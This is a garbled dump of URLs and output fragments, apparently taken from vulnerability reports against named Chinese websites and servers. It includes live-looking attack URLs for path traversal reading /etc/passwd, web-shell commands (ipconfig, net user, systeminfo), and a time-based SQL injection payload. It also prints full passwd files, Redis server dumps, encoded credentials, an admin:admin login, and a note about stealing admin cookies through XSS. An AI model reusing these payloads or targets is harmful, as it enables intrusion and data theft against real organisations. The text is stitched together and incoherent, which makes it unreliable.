http://yjsy.dept.ccut.edu.cn/sort.asp?3d2y35283z2f1.html http://**.**.**.**:8443/index.php?a=dataversion&c=app&m=api https://nosec.org/my/threats/874 http://ecadmin.ddexp.com.cn/ http://i.lvgou.com/.svn/entries http://new.lvgou.com/lvgou.zip http://weixin.lvgou.com/lvgou.zip http://shouji.sogou.com/sapp/media/pc.html?site=20150212website 
http://quanjing.baidu.com/panoShare/versions/v1/fetchImage.php?id=http://family.baidu.com/ http://d.fm.ifeng.com/fm/read/fmd/public/reportResourceUserScore_640.html http://**.**.**.**ipr.jp/login.action http://club.kingdee.com/uc_server/admin.php https://mail.fortinet.com.cn http://www.hr.com.cn/ www.hr.com.cn https://oa.minshengec.cn/seeyon//logs/login.log http://mail.scal.com.cn/names.nsf?Login http://www.zonglai.com/client_detail.html?client_id=1114 http://www.cyw.dept.ccut.edu.cn/pic.asp?id=465 http://kyc.dept.ccut.edu.cn/pic.asp?id=445 http://jxjy.dept.ccut.edu.cn/pic.asp?id=246 http://3y3s.zt.ccut.edu.cn/pic.asp?id=451 http://jdgc.dept.ccut.edu.cn/pic.asp?id=919 http://gfzwl.jpk.ccut.edu.cn/pic.asp?id=490 http://dzswsw.yxk.ccut.edu.cn/pic.asp?id=468 http://ywhcfy.yxk.ccut.edu.cn/pic.asp?id=505 http://hxsm.dept.ccut.edu.cn/pic.asp?id=52 http://dqxy.dept.ccut.edu.cn/pic.asp?id=445 http://xsc.dept.ccut.edu.cn/pic.asp?id=467 http://tyjy.dept.ccut.edu.cn/pic.asp?id=503 http://zcglc.dept.ccut.edu.cn/pic.asp?id=454 http://hqc.dept.ccut.edu.cn/pic.asp?id=487 http://wmw.dept.ccut.edu.cn/pic.asp?id=493 http://xjb.dept.ccut.edu.cn/pic.asp?id=483 http://fzgh.dept.ccut.edu.cn/pic.asp?id=478 http://kycsk.dept.ccut.edu.cn/pic.asp?id=246 http://aims.dept.ccut.edu.cn/pic.asp?id=464 http://xlzx.zt.ccut.edu.cn/pic.asp?id=492 http://gh.dept.ccut.edu.cn/pic.asp?id=479 http://mba.dept.ccut.edu.cn/pic.asp?id=454 http://app.3see.com/job/public/post.php?pid=2960 http://dag.dept.ccut.edu.cn/ http://221.226.125.220:8001/iphone/ encap:Ethernet D8:D3:85:A7:39:44 addr:172.18.10.103 Bcast:172.18.255.255 Mask:255.255.0.0 dad3:85ff:fea7:3944/64 Scope:Link MTU:1500 packets:1168284754 packets:470174835 txqueuelen:1000 http://3g.163.com/ntes/special/00340QR4/app.html#download http://[IP]/config/user_toLoginPage.action http://【IP】/admin/user_updatePassword.action?nowTime=【时间戳】 http://store.dji.com/cn/product/phantom-4 https://store.dji.com/cn/buy/checkout?t=bn&i=4231&q=1&bind_care_id=0 
https://store.dji.com/cn/transactions/32457360e54d332213645731228b456c jdbc:oracle:thin:@**.**.**.**:1521:ebank http://www.chinese-js.com/NewsDetail.aspx?id=105192 http://**.**.**.**/ https://103.245.128.110:8880/ http://218.242.60.194:8080/PDBSReports/login.aspx http://218.242.60.194:8080 http://114.141.178.135/index.php http://114.141.178.135/include/cacti.2015-01-22.sql http://114.141.178.135:8080/webloader http://114.141.178.105:8080/webloader https://54.223.244.5:47583/frame.htm http://base.263zztx.com/ http://boss-ims.263zztx.com/ http://ots.hp-telecom.com/ http://hpt.3g.hp-telecom.com/ http://114.141.178.105/inbox http://base.263zztx.com//uploads/attachments/224cd1e7bd02097aa1a55549458f3ed4.pdf http://114.141.185.54:9090/263Server/ http://122.112.15.197 http://122.112.15.197/admin/user/inituserinfo.p http://122.1 https://github.com/swrazg/Data_watch/blob/8928be298f723445954fb93ab1e3a2478f65ca3d/send_mail.py http://114.255.197.64:9090/ http://114.255.197.64:9090/1.asp Site:http://crm.airkunming.com/ http://eln.coolpad.com Mosuan-3:tangscan http://eln.coolpad.com http://eln.coolpad.com http://eln.coolpad.com root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi 
daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin checkuser:x:500:500::/home/checkuser:/bin/bash tomcat:x:501:501::/home/tomcat:/bin/bash virtual:x:502:502::/home/virtual:/bin/false nagios:x:503:503::/usr/local/nagios:/bin/bash elearning:x:504:504::/home/elearning:/bin/bash http://wooyun.org/bugs/wooyun-2015-0106070 http://**.**.**.**/console/loginExit/loginExit_DG3!login.action https://github.com/arjrWangwei/Underground/blob/7b8e8f3f2ea9dd9520d9e367416a49778e227d29/EmailService/src/test/java/com/creditcloud/email/EmailTest.java https://github.com/miuraSky/gouda-php-jmirrors/blob/414eba4ad26c6ae952af237367bf3ff076e4fb31/build.gradle https://gitlab.creditcloud.com/public jdbc:oracle:thin:@**.**.**.**:1521:watf http://61.135.151.193/login.aspx http://my.tv.sohu.com/user/setting/basic.do http://180.76.153.23 http://180.76.153.23:81/ http://mall.wan.2345.com/task/taskList?gid=1021&own=0&page=1 http://wechat.datangmobile.cn http://wechat.datangmobile.cn/axis2/ http://wechat.datangmobile.cn/axis2/services/Cat/exec?cmd=systeminfo http://sjc.hubu.edu.cn/gzdt_detail.asp?id=367 http://sjc.hubu.edu.cn/gzdt_detail.asp http://psy.hubu.edu.cn/Admin/Login.aspx http://klsaofm.hubu.edu.cn/webmanage/web_manage.asp http://gs.hubu.edu.cn/more.aspx?xt=2004618433 http://gs.hubu.edu.cn/score/default.aspx http://www.koyimall.com/?act=shop.goods_view&GS=219967 http://**.**.**.**/ 
http://**.**.**.**/Machine/remote/?acid=361525 http://**.**.**.**/Machine/remote/?acid=361536 http://**.**.**.**/Machine/remote/?acid=361559 http://**.**.**.**/Machine/remote/?acid=361562 http://**.**.**.**/Machine/remote/?acid=361565 http://**.**.**.**/Machine/remote/?acid=361573 http://**.**.**.**:10038/severlogin.html#wwwuser/user=TWpFd016SXpNVEF3TURBd01EYz0=&wwwuser/password=WVRJeE1ETXlNekV3TURBd01EQTM= http://**.**.**.**:10000/severlogin.html#wwwuser/user=ZEdsaGJuUnBZVzVvWVc1NmFHVnVadz09&wwwuser/password=ZEdsaGJuUnBZVzVvWVc1NmFHVnVaelkyT0E9PQ== http://m.sjzhushou.com/cgi-bin/msgList?device=iPhone8%2C1&ios_ver=9.3.1&maxCount=10&partnerId=0x20800003&peerID=bc9b70763a1d003V&peer_id=bc9b70763a1d003V&productID=31&product_id=31×tamp=1460350872.750189&ver=5.13.1.2782&versionCode=51301 www.wjasset.com http://www.wjasset.com http://**.**.**.**/bugs/wooyun-2010-0192841,"基本上"是利用%23%0a进行bypass,没错,都修复了。 http://mailarchive.263.net/help.jsp http://mailarchive.263.net:8080/help.jsp http://www.chinazrbc.com/indexv.action http://qcar.**.**.**.**/reLogin.do http://**.**.**.**/portal/c http://m.sjzhushou.com/cgi-bin/msgList?device=iPhone7%2C2&ios_ver=9.3.1&maxCount=10&partnerId=0x20800003&peerID=e3efbe5003V&peer_id=e3efbe003V&productID=31&product_id=31×tamp=1454238001&ver=5.13.1.2782&versionCode=51301 http://test.geetest.com/存在phpmyadmin以及wordpress。加上兑换回来的插件扫了一遍,居然发现被扫出来了弱口令 http://**.**.**.**/ http://**.**.**.**/access_nodes/100000 http://**.**.**.**/access_nodes/172642 http://**.**.**.**/access_nodes/500 http://**.**.**.**/access_nodes/690 http://**.**.**.**/rest/developer/toDeveloperCert http://**.**.**.**//files//5147-20160412090203.jsp http://m.sjzhushou.com/cgi-bin/media_filter?code=all_movie&ver=51301&product_id=37&area=0×tamp=1460420940482&xlcache=2&tab=1*&year=0&versioncode=90220&op=2&page=1&pm=iphone 
http://m.sjzhushou.com/ios_page/iphone/channel/movie_v36.html?category=movie&code=all_movie&type=all_movie&area=0&year=0&isVip=0&peerID=1c661bf1c21d003V&peer_id=1c661bf1c21d003V&ver=5.13.1.2782&productID=31&ios_ver=7.1.1&versionCode=51301&product_id=31&partnerId=0x20800003&device=iPhone4,1&encode=1 share.kuwo.cn/album/h/xinQingViewtype=mb&subkey=3658&page=8&id=8 http://211.151.175.94/ http://115.29.169.166 http://42.62.30.18:8080/ http://42.62.30.18:8080/service/?typeId=1001*&pageChannel=4&_=1460430144351&time=-1 http://www.ehs360.com/search.php?tag=+%E5%91%BC%E5%90%B8 https://my.hfbank.com.cn:8091/cgi-bin/test-cgi https://game.egbank.com//cgi-bin/test-cgi http://s2.app1104922445.qqopenapp.com/ http://s2.app1104922445.qqopenapp.com:82/ http://my.qzone.qq.com/app/1104922445.html http://mobstat.fengjr.com/razor/index.php?/ums/postEvent http://mobstat.fengjr.com/razor/index.php?/ums/postEvent http://**.**.**.**/123.php http://s2.app1104922445.qqopenapp.com:82/System/ServerEdit/1 http://s2.app1104922445.qqopenapp.com:82/t.aspx http://tk2.ya247.com redis_version:2.6.16 redis_git_sha1:00000000 redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.4.6 process_id:4043 run_id:0f89bdc9a6b581d090794c2958a66378f908ac7c tcp_port:7377 uptime_in_seconds:3870141 lru_clock:1341304 used_memory:2912472 used_memory_human:2.78M used_memory_rss:47570944 used_memory_peak:12092599096 http://s138.app24599.qqopenapp.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://s138.app24599.qqopenapp.com/ http://xia.qq.com/ http://s138.app24599.qqopenapp.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts http://km.oa.com/group/gslb/article_view/60750 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown 
halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin nslcd:x:65:55:LDAP User:/:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin arpwatch:x:77:77::/var/lib/arpwatch:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin www:x:50001:500::/data/www:/bin/bash http://api.ycpai.com/admin/ycpai_center/user_list/?menuid=60&page=10 http://www.ycpai.com/h5/partner/partner_list?login_code= http://www.sqtxj.com/language/Change.do?languageName=cn存在命令执行漏洞 http://www.xiaoshuxiong.com/?fm=7 http://www.xiaoshuxiong.com/?fm=7 http://**.**.**.**/bugs/wooyun-2015-0165284 http://183.230.4.37:8000/manager/html http://**.**.**.**/ http://**.**.**.**:8055/hmwap/main/index.action http://www.yinhoo.com/news.php?id=41 http://**.**.**.**bn.tv/ http://**.**.**.**bn.tv/channels/4.html http://**.**.**.**bn.tv/CCBN/ExhibitionOnline.aspx?TypeID=&HallID=&CustomerName=p http://**.**.**.**/ http://cloud.vpclub.cn/ http://cloud.vpclub.cn/Common/RemoteUpload.ashx?action=managerfile&path=../ https://www.e-custody.com/login.jsp http://house.focus.cn/dmc/type_list.php?bathroom=0&bedroom=0&group_id=2572&page=2&price=&proj_id=1619&set_type=0&sittingroom=0&total_price= http://211.151.3.118/ksweb/login/go http://116.10.197.134:8080/#login 
http://wenduwx.7east.cn/xmlaction!ReduceCnt.do http://**.**.**/console/ jdbc:oracle:thin:@**.**.**.**:1521:yktdb http://ordosles.mychery.com/wcn/frame/.x http://111.207.167.212 http://**.**.**.**/spsp/login!logout.do http://share.vip.com/Acts/SetCount?id=63200 http://pc.ehuatai.com/upload/fckeditor/xsxs.aspx http://218.78.214.24:8080/live/service/top/hasNewOrgan?code=310112110&username=eshimin34188390 http://apps.eshimin.com/survey/invest/addDcResult http://115.182.70.182/login_login.action http://115.182.70.176:8080/login_login.action https://auth.p4p.sogou.com/login?service=${1000-900 https://auth.p4p.sogou.com/login?service=${pageContext http://game.2345.com/server/search/think.php?so=a http://drops.wooyun.org/tools/4760 http://ucenter.1312.com/data/tmp/upload1257554.jpg/.php IP:180.76.140.233 redis_version:2.8.4 redis_git_sha1:00000000 redis_build_id:a44a05d76f06a5d9 redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.8.2 process_id:24318 run_id:8fe479471888bb4edc00af947ca7aea4e2541274 tcp_port:6379 uptime_in_seconds:6657827 lru_clock:1349883 used_memory:544768 used_memory_human:532.00K used_memory_rss:1638400 used_memory_peak:1237600 used_memory_peak_human:1.18M used_memory_lua:38912 mem_fragmentation_ratio:3.01 mem_allocator:jemalloc-3.4.1 rdb_changes_since_last_save:10478 rdb_last_save_time:1454398032 rdb_last_bgsave_status:err total_connections_received:2166 total_commands_processed:38777 keyspace_hits:12138 keyspace_misses:7057 latest_fork_usec:196 role:master repl_backlog_size:1048576 used_cpu_sys:1419.20 used_cpu_user:1636.42 used_cpu_sys_children:292.56 used_cpu_user_children:166.27 db0:keys=1,expires=0,avg_ttl=0 IP:182.61.9.225 redis_version:3.0.5 redis_git_sha1:00000000 redis_build_id:a46578aeaeed0f67 redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.4.7 process_id:22404 run_id:3e7fda016038c7bc6fb37480fb4bcb4199f909f3 tcp_port:6379 uptime_in_seconds:1786283 lru_clock:916177 config_file:/etc/redis.conf 
used_memory:901120 used_memory_human:880.00K used_memory_rss:2678784 used_memory_peak:949112 used_memory_peak_human:926.87K used_memory_lua:36864 mem_fragmentation_ratio:2.97 mem_allocator:libc rdb_last_save_time:1460525179 total_connections_received:7213 total_commands_processed:7534 total_net_input_bytes:398687 total_net_output_bytes:126621 instantaneous_input_kbps:0.00 instantaneous_output_kbps:0.00 keyspace_hits:633 latest_fork_usec:215 role:master repl_backlog_size:1048576 used_cpu_sys:507.02 used_cpu_user:330.11 used_cpu_sys_children:0.09 used_cpu_user_children:0.00 db0:keys=4,expires=0,avg_ttl=0 IP:180.76.149.53 redis_version:3.0.6 redis_git_sha1:00000000 redis_build_id:5c7eaa2e19cb5102 redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.4.7 process_id:1732 run_id:beb0c8ab0beb39c0e67978f94e8d52b5d6b80fc0 tcp_port:6379 uptime_in_seconds:6734471 lru_clock:916289 config_file:/home/wwwroot/www.shell.com/redis-3.0.6/redis.conf used_memory:917904 used_memory_human:896.39K used_memory_rss:2617344 used_memory_peak:949696 used_memory_peak_human:927.44K used_memory_lua:36864 mem_fragmentation_ratio:2.85 mem_allocator:libc rdb_last_save_time:1460470546 aof_current_size:70952 total_connections_received:910 total_commands_processed:1109 total_net_input_bytes:101816 total_net_output_bytes:214890 instantaneous_input_kbps:0.00 instantaneous_output_kbps:0.00 latest_fork_usec:384 role:master repl_backlog_size:1048576 used_cpu_sys:5805.96 used_cpu_user:2799.02 used_cpu_sys_children:0.14 used_cpu_user_children:0.05 db0:keys=1,expires=0,avg_ttl=0 ip:180.76.150.114 redis_version:2.8.19 redis_git_sha1:00000000 redis_build_id:edaf234646095212 redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.4.7 process_id:25344 run_id:67e5ec4c3834b9726edffc0ee3fb92b8ebc7ca51 tcp_port:6379 uptime_in_seconds:14007210 uptime_in_days:162 lru_clock:916339 config_file:/etc/redis.conf used_memory:1878720 used_memory_human:1.79M used_memory_rss:7864320 
used_memory_peak:7404136 used_memory_peak_human:7.06M used_memory_lua:35840 mem_fragmentation_ratio:4.19 mem_allocator:jemalloc-3.6.0 rdb_last_save_time:1460364014 total_connections_received:459173997 total_commands_processed:873581211 total_net_input_bytes:31283716245 total_net_output_bytes:567422830645 instantaneous_input_kbps:1.18 instantaneous_output_kbps:18.84 keyspace_hits:2112479520 latest_fork_usec:340 role:slave master_host:121.40.56.18 master_port:6379 slave_repl_offset:11671009 slave_priority:100 repl_backlog_size:1048576 used_cpu_sys:89698.45 used_cpu_user:38758.61 used_cpu_sys_children:2.06 used_cpu_user_children:0.68 db0:keys=440,expires=0,avg_ttl=0 ip:180.76.147.42 redis_version:2.5.14 redis_git_sha1:21645232 redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.6.3 process_id:13481 run_id:52eb35d50863a823ec6fbccbc7faae2a3e5b8e61 tcp_port:6379 uptime_in_seconds:3129468 lru_clock:1349929 used_memory:564560 used_memory_human:551.33K used_memory_rss:2146304 used_memory_peak:645216 used_memory_peak_human:630.09K used_memory_lua:31744 mem_fragmentation_ratio:3.80 mem_allocator:jemalloc-3.0.0 rdb_last_save_time:1460534001 aof_current_size:27831065 total_connections_received:2146 total_commands_processed:342802 keyspace_hits:992383 keyspace_misses:194 latest_fork_usec:265 role:master used_cpu_sys:4661.32 used_cpu_user:2119.40 used_cpu_sys_children:1.70 used_cpu_user_children:0.11 db0:keys=6,expires=0 http://bsy.7cha.com/wsc下订单处地址栏可以插入xss代码,已打管理员cookeis,进入后台,各种数据泄露 http://www.51ruyidai.com/data/avatar/6317_avatar_middle.jpg/.php http://bbs.wan.58.com//config/config_ucenter.php.bak http://**.**.**.**/manager/html http://**.**.**.**/WiFiSDK/index.jsp?z0=utf-8 http://so.2345.com/2345app/get_app_news.php?nt=0&type=660&id= http://**.**.**/_ Bcast:192.168.255***** fefb:f***** http://125.76.246.246:8080/ztehby/user_loginUI.do http://**.**.**/_ http://**.**.**/script_ www.ejsh.com.c***** www.ejsh.com.c***** http://esmdownload1.yulong.com/ftp.login.htm 
http://esmdownload1.yulong.com/666.jsp?pwd=023&i=ipconfig ffff:ffff:fffd%4 c058:6301::c058:6301 http://esmdownload1.yulong.com/666.jsp?pwd=023&i=net%20user http://**.**.**.**/ http://**.**.**.**/MyAccount/MyOrderDetail.aspx?soSysNo=28385 http://**.**.**.**/bugs/wooyun-2015-0157676 http://**.**.**.**/bugs/wooyun-2010-0148933 ruins:/usr/share/w3af/w3af/plugins/attack/db/sqlmap# http://**.**.**.** http://www.eaonline.com.cn/chargezone/chargeContent.dll?id=1000 http://www.eaonline.com.cn/chargezone/chargeList.dll?kind=b http://www.eaonline.com.cn/info/serviceContent.dll?id=82818 http://www.eaonline.com.cn/cpzs/cpzs.php?id=1369 http://www.eaonline.com.cn/info/infoContent.dll?id=123540 http://www.eaonline.com.cn/info/infoListnews.dll?id=10 http://funxoo.com/mapsearch.php?contentid=146028 http://funxoo.com/mapsearch.php?ditie=1&price=&diqu=10&housetype=1 http://funxoo.com/houselist.php?p=&bankuai=1&catid=69 http://www.funxoo.com/eshouselist.php?rentype=0&price=1&diqu=0&catid=78 http://www.funxoo.com/houselist_wj.php?catid=218&ditie=0&price=0&diqu=76 http://www.funxoo.com/czhouselist.php?rentype=2&diqu=0&catid=83 http://bbs.funxoo.com/uc_server index.php/web/web/addShoulu http://sums.suning.com/announce/download.htm?classification1=/home/backend/.ssh/authorized_keys&name= http://cos.sto.cn/login/Login.jsp?logintype=1 http://cos.sto.cn/hrm/resource/HrmResourceBasicInfo.jsp?id=25 http://cos.sto.cn/hrm/resource/HrmResourceBasicInfo.jsp?id=25 http://cos.sto.cn/hrm/resource/HrmResourceBasicInfo.jsp?id=25 http://xgt2015.dragonpass.com.cn:58124 https://bp.dragonpass.com.cn/about/addCustomerShare http://**.**.**.**:8081/certificate/index.do http://**.**.**.**/merchant/enterprise/registerComUserForward.jhtml http://f.youdao.com/file.do?method=getMajorName&subject=undefined* http://sqlmap.org http://api.v.2345.com/html/mversion/checkIsEnable.php?id=159817*&media=dy&device=android&callback=jsonp12 http://sqlmap.org http://101.227.68.57:8080 
http://101.227.68.57:8080/plugins/weathermap/configs/test.php http://101.227.68.57:8080/plugins/weathermap/configs/wooy1n.php http://vip.iqiyi.com/order.html?mainland=1&serviceCode=lyksc7aq36aedndk&pid=a0226bd958843452&fc=a988b1d4503873af http://account.iqiyi.com/package/package.action http://www.haikele.com/yssfclist.aspx?Type=A http://www.haikele.com/yssfclist.aspx?Taste=A http://www.haikele.com/sfcwzlb.aspx?CategoryID=U www.haikele.com http://www.haikele.com https://**.**.**.**/franksheng/tal/blob/5cad746ab8e8cc29cb15c8579db1dd733b2d9c2e/tal-server/src/main/java/upsmart/tal/server/mail/MailTest.java http://123.206.58.124/user_login.php https://mail.midea.com/ https://mail.midea.com/coremail/common/preview/preview.jsp?mid=2%3a1tbiAgQFLVYilUwPWAAAmU&mboxa=&part=5 http://211.100.37.7/ http://211.100.37.7/.svn/entries http://211.100.37.34/login.do http://211.100.37.7/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://carprice.58.com jdbc:oracle:thin:@ http://115.182.51.77:8080/live-ms3/login http://58.248.41.164/jenkins/ http://cos.sto.cn/login/Login.jsp?logintype=1 http://cos.sto.cn/services/MobileService SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/ xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/ xmlns:xsd="http://www.w3.org/1999/XMLSchema xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance xmlns:m0="http://tempuri.org/ xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/ xmlns:urn="webservices.services.weaver.com.cn xmlns:urn2="http://workflow.webservices.mobile.weaver SOAP-ENV:Header/ SOAP-ENV:Body urn:checkUserLogin urn:in0 urn:in0 urn:in1 urn:in1 urn:in2 urn:in2 urn:checkUserLogin SOAP-ENV:Body SOAP-ENV:Envelope http://apps.d.ifeng.com/index.php/voting/index/answer/tid/199 http://cidadev01.chinacloudapp.cn/cida_platform/ url:http://cms.dichan.com/default.aspx http://**.**.**.**/bugs/wooyun-2010-0119996 http://**.**.**.**/bugs/wooyun-2015-0119873 http://**.**.**.**/bugs/wooyun-2015-0119996 
http://**.**.**.**/bugs/wooyun-2016-0196048 http://**.**.**.**/bugs/wooyun-2015-0120530/ jdbc:oracle:thin:@**.**.**.**:1521:ORCL jdbc:oracle:thin:@**.**.**.**:1521:ORCL encap:Ethernet c6:38:99 addr:218.30.113.65 Bcast:218.30.113.127 Mask:255.255.255.192 fec6:3899/64 Scope:Link MTU:1500 packets:3979542 packets:97531 txqueuelen:1000 http://lpsqs01.cpicbj.com:8080/CPICPrint/platform/login.do http://gouwu.duba.com www.balans.com.cn/news-details.php?id=28 https://mlife.cmbchina.com/PlutoPushProxy/queryMessageFromClientV5.json https://mlife.cmbchina.com/PlutoPushProxy/queryMessageFromClientV5.json https://uc.qycn.com/login.php https://uc.qycn.com/announcement.php?an_status=1&act=search&an_publish_time=%E8%AF%B7%E9%80%89%E6%8B%A9%E5%8F%91%E5%B8%83%E6%97%A5%E6%9C%9F&an_end_time=%E8%AF%B7%E9%80%89%E6%8B%A9%E7%BB%93%E6%9D%9F%E6%97%A5%E6%9C%9F&keyword=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%85%B3%E9%94%AE%E5%AD%97&type=list&submit=%E6%90%9C+%E7%B4%A2 http://mt.emaotai.cn:9188/System/Admin/Login admin:admin http://qr.emaotai.cn:8002/Login.aspx http://item.m.jd.com/product/11219511.html http://item.m.jd.com/product/2493112.html http://**.**.**.**/download/listdown.asp?id=7156 http://m.sfn.cn/pcview.html?url=http://m.sfn.cn/mobile/member/login.aspx https://219.141.191.165/IMRINFO/AT/ZIMComm https://95566.boc.cn/IMRINFO/AT/ZIMComm https://95566.boc.cn/ZIM/IMRINFO/AT/ZIMComm http://202.98.222.93:5000/rlzy/LoginTo.aspx http://open.lmbang.com/find-result/index?mvc=1&kw=1 http://wap.emaotai.cn:9000 http://wap.emaotai.cn:9000/eAPI/API/safe/GetAllPersonOptions?firstlabel=--%E8%AF%B7%E9%80%89%E6%8B%A9%E7%94%A8%E6%88%B7--&firstvalue=&Deptbm=008000000001069&loginid=&usercode= http://**.**.**.**/ index.php/Admin/Index/login http://**.**.**.**:8080/Admin/HomePage/index index.php/Admin/Index/login http://**.**.**.**/index.php/Admin/Main/login http://**.**.**.**//resin-doc/examples/security-basic/viewfile?file=WEB-INF/password.xml 
http://**.**.**.**//resin-doc/examples/security-basic/viewfile?file=WEB-INF/WEb.xml URL:http://219.135.189.180:8090/jmx-console/ http://219.135.189.180:8090/jmx-console/ http://219.135.189.180:8090/EngineWeb/ http://219.135.189.180:8090/admin-console/ http://219.135.189.180:8090/bpel-console http://219.135.189.180:8090/gpd-deployer/ http://219.135.189.180:8090/juddiv3/ http://219.135.189.180:8090/web-console http://219.135.189.180:8090/noo/index.jsp http://10.10.2.9:8080 http://10.10.2.27:80 http://10.10.2.9:80 http://10.10.2.22:8080 http://10.10.2.14:8081 http://10.10.2.21:8080 http://10.10.2.14:80 http://10.10.2.29:8081 http://10.10.2.15:80 http://10.10.2.17:80 http://10.10.2.24:80 http://10.10.2.25:80 http://10.10.2.100:8080 http://**.**.**.**/bugs/wooyun-2016-0169453 http://**.**.**.**/phpmyadmin/ http://**.**.**.**/Admin/Index1/login http://**.**.**.**/Uploads/f.php http://**.**.**.**/Uploads/f.php http://**.**.**.**/op/advice.do?method=adviceInfo&ctrl=mod http://**.**.**.**/op/pages/login.jsp http://git.corp.ppweb.com.cn/public http://rscdn.vjia.com/css.ashx?href=web.config http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/Connection.config http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/Parameters.xml http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/WebSite.xml http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/RSConfig.xml http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/SearchConfig.xml http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/SolrCoreConfig.xml http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/CacheConfig.config http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/SortConfig.xml http://mall.lmbang.com/api-comment/list?client=web&client=web&os=h5&client_flag=lmbang&id=29587&p=1&ps=1 http://mall.lmbang.com/api-comment/list?client=web&client=web&os=h5&client_flag=lmbang&id=29587&p=1&ps=1%20procedure%20analyse%28extractvalue%281,benchmark%2810000000,md5%28111%29%29%29,1%29%20--%20- https://jikexueyuan.zentaopm.com/ http://work.eoemobile.com 
http://**.**.**.**/user/info.html http://**.**.**.**/user/index.html http://**.**.**.**/user/info.html http://**.**.**.**/user/info.html http://**.**.**.**/index.php http://**.**.**.**/index.php http://**.**.**.**/index.php/admin/index/login http://**.**.**.**/index.php http://game.weibo.com/home/giftcenter/allgift?id=1793466158 http://game.weibo.com/home/giftcenter/allgift?id=1793466158 http://www.wswifi.cn/news_text.asp?newsid=3 http://ws.wswifi.cn/news_text.asp?newsid=25 jdbc:oracle:thin:@**.**.**.**:1521:jnwsfwdb1 http://clientuser.16wifi.com/app_api/userInfo/getUserInfoById.html?uid=1 http://clientuser.16wifi.com/app_api/userInfo/getUserInfoById.html?uid=333 http://clientuser.16wifi.com/app_api/userInfo/getUserInfoById.html?uid=666666 http://clientuser.16wifi.com/app_api/userInfo/getUserInfoById.html?uid=678289 